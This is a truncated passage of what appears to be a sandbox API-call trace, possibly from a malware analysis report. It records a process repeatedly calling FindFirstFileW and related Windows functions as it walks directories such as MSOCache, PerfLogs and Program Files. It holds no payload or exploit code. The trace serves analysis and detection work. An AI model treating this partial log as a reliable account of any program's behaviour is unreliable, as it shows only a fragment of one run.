| out: hFindFile=0xb440e8) returned 1 [0093.416] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x6ee8e4 | out: lpFindFileData=0x6ee8e4*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xf58ee8d0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf6e0ec10, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf6e0ec10, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.417] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.418] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x6ee8a4 | out: lpFindFileData=0x6ee8a4*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xa5b30b20, ftCreationTime.dwHighDateTime=0x1d305f1, ftLastAccessTime.dwLowDateTime=0xa5bc90a0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa5bc90a0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.420] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.421] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x6ee8e4 | out: lpFindFileData=0x6ee8e4*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xa5b30b20, ftCreationTime.dwHighDateTime=0x1d305f1, ftLastAccessTime.dwLowDateTime=0xa5bc90a0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa5bc90a0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.422] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.423] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x6ee8a4 | out: lpFindFileData=0x6ee8a4*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xee38cbf0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xee803530, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xee803530, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.425] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.426] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x6ee8e4 | out: lpFindFileData=0x6ee8e4*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xee38cbf0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xee803530, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xee803530, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.426] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.427] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x6ee8a4 | out: lpFindFileData=0x6ee8a4*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe7b68970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe8729610, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe8729610, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.428] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.429] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x6ee8e4 | out: lpFindFileData=0x6ee8e4*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe7b68970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe8729610, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe8729610, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.430] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.431] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\*", lpFindFileData=0x6ee8a4 | out: lpFindFileData=0x6ee8a4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe8691090, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe8691090, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe8691090, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.432] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.432] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\*", lpFindFileData=0x6ee8e4 | out: lpFindFileData=0x6ee8e4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe8691090, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe8691090, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe8691090, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.432] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.432] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x6ee8a4 | out: lpFindFileData=0x6ee8a4*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfa13c510, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc112b50, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc112b50, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.434] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.435] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x6ee8e4 | out: lpFindFileData=0x6ee8e4*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfa13c510, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc112b50, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc112b50, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.436] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.437] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\*", lpFindFileData=0x6ee8a4 | out: lpFindFileData=0x6ee8a4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfa2b92d0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc0c6890, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc0c6890, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.440] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.440] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\*", lpFindFileData=0x6ee8e4 | out: lpFindFileData=0x6ee8e4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfa2b92d0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc0c6890, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc0c6890, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.441] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.442] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\*", lpFindFileData=0x6ee8a4 | out: lpFindFileData=0x6ee8a4*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfe09ced0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x18179b90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x18179b90, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.445] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.445] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\*", lpFindFileData=0x6ee8e4 | out: lpFindFileData=0x6ee8e4*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfe09ced0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x18179b90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x18179b90, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.446] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.446] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\*", lpFindFileData=0x6ee8a4 | out: lpFindFileData=0x6ee8a4*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xa5cd3a40, ftCreationTime.dwHighDateTime=0x1d305f1, ftLastAccessTime.dwLowDateTime=0xa8c22f80, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa8c22f80, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.449] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.449] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\*", lpFindFileData=0x6ee8e4 | out: lpFindFileData=0x6ee8e4*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xa5cd3a40, ftCreationTime.dwHighDateTime=0x1d305f1, ftLastAccessTime.dwLowDateTime=0xa8c22f80, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa8c22f80, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.450] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.451] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\*", lpFindFileData=0x6ee8a4 | out: lpFindFileData=0x6ee8a4*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0x46538340, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x4a6d41a0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x4a6d41a0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.454] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.455] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\*", lpFindFileData=0x6ee8e4 | out: lpFindFileData=0x6ee8e4*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0x46538340, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x4a6d41a0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x4a6d41a0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.455] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.456] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6eeb80) returned 1 [0093.456] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6eeb8c) returned 1 [0093.457] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6eebc0) returned 1 [0093.457] GetFullPathNameW (in: lpFileName="C:\\PerfLogs", nBufferLength=0x105, lpBuffer=0x6ee6c8, lpFilePart=0x0 | out: lpBuffer="C:\\PerfLogs", lpFilePart=0x0) returned 0xb [0093.457] GetFullPathNameW (in: lpFileName="C:\\PerfLogs\\", nBufferLength=0x105, lpBuffer=0x6ee69c, lpFilePart=0x0 | out: lpBuffer="C:\\PerfLogs\\", lpFilePart=0x0) returned 0xc [0093.457] FindFirstFileW (in: lpFileName="C:\\PerfLogs\\*", lpFindFileData=0x6ee8e8 | out: lpFindFileData=0x6ee8e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfcd23a40, ftLastAccessTime.dwHighDateTime=0x1d68bac, ftLastWriteTime.dwLowDateTime=0xfcd23a40, ftLastWriteTime.dwHighDateTime=0x1d68bac, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.457] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.457] FindFirstFileW (in: lpFileName="C:\\PerfLogs\\*", lpFindFileData=0x6ee8a4 | out: lpFindFileData=0x6ee8a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfcd23a40, ftLastAccessTime.dwHighDateTime=0x1d68bac, ftLastWriteTime.dwLowDateTime=0xfcd23a40, ftLastWriteTime.dwHighDateTime=0x1d68bac, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.457] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.457] FindFirstFileW (in: lpFileName="C:\\PerfLogs\\*", lpFindFileData=0x6ee8e4 | out: lpFindFileData=0x6ee8e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfcd23a40, ftLastAccessTime.dwHighDateTime=0x1d68bac, ftLastWriteTime.dwLowDateTime=0xfcd23a40, ftLastWriteTime.dwHighDateTime=0x1d68bac, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.458] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.458] FindFirstFileW (in: lpFileName="C:\\PerfLogs\\Admin\\*", lpFindFileData=0x6ee8a4 | out: lpFindFileData=0x6ee8a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xbbba4afc, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.458] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.458] FindFirstFileW (in: lpFileName="C:\\PerfLogs\\Admin\\*", lpFindFileData=0x6ee8e4 | out: lpFindFileData=0x6ee8e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xbbba4afc, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.458] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.458] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6eeb80) returned 1 [0093.458] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6eeb8c) returned 1 [0093.458] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6eebc0) returned 1 [0093.458] GetFullPathNameW (in: lpFileName="C:\\Program Files", nBufferLength=0x105, lpBuffer=0x6ee6c8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files", lpFilePart=0x0) returned 0x10 [0093.458] GetFullPathNameW (in: lpFileName="C:\\Program Files\\", nBufferLength=0x105, lpBuffer=0x6ee69c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\", lpFilePart=0x0) returned 0x11 [0093.458] FindFirstFileW (in: lpFileName="C:\\Program Files\\*", lpFindFileData=0x6ee8e8 | out: lpFindFileData=0x6ee8e8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfcd23a40, ftLastAccessTime.dwHighDateTime=0x1d68bac, ftLastWriteTime.dwLowDateTime=0xfcd23a40, ftLastWriteTime.dwHighDateTime=0x1d68bac, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.459] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.459] FindFirstFileW (in: lpFileName="C:\\Program Files\\*", lpFindFileData=0x6ee8a4 | out: lpFindFileData=0x6ee8a4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfcd23a40, ftLastAccessTime.dwHighDateTime=0x1d68bac, ftLastWriteTime.dwLowDateTime=0xfcd23a40, ftLastWriteTime.dwHighDateTime=0x1d68bac, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.459] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.459] FindFirstFileW (in: lpFileName="C:\\Program Files\\*", lpFindFileData=0x6ee8e4 | out: lpFindFileData=0x6ee8e4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfcd23a40, ftLastAccessTime.dwHighDateTime=0x1d68bac, ftLastWriteTime.dwLowDateTime=0xfcd23a40, ftLastWriteTime.dwHighDateTime=0x1d68bac, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.459] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.459] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\*", lpFindFileData=0x6ee8a4 | out: lpFindFileData=0x6ee8a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x69da35f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x69da35f0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.459] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.459] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\*", lpFindFileData=0x6ee8e4 | out: lpFindFileData=0x6ee8e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x69da35f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x69da35f0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.460] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.460] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\DESIGNER\\*", lpFindFileData=0x6ee8a4 | out: lpFindFileData=0x6ee8a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x69da35f0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x69dc9750, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x69dc9750, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.460] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.460] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\DESIGNER\\*", lpFindFileData=0x6ee8e4 | out: lpFindFileData=0x6ee8e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x69da35f0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x69dc9750, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x69dc9750, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.460] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.460] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\*", lpFindFileData=0x6ee8a4 | out: lpFindFileData=0x6ee8a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x81afcd40, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x81afcd40, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.461] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.461] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\*", lpFindFileData=0x6ee8e4 | out: lpFindFileData=0x6ee8e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x81afcd40, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x81afcd40, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.461] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.461] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\*", lpFindFileData=0x6ee8a4 | out: lpFindFileData=0x6ee8a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51e19d30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xdbe166c0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xdbe166c0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.463] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.463] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\*", lpFindFileData=0x6ee8e4 | out: lpFindFileData=0x6ee8e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51e19d30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xdbe166c0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xdbe166c0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.463] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.463] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\*", lpFindFileData=0x6ee8a4 | out: lpFindFileData=0x6ee8a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed38550, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeef015d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeef015d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.463] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.463] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\*", lpFindFileData=0x6ee8e4 | out: lpFindFileData=0x6ee8e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed38550, ftCreationTime.dwHighDateTime=0x1d301be, 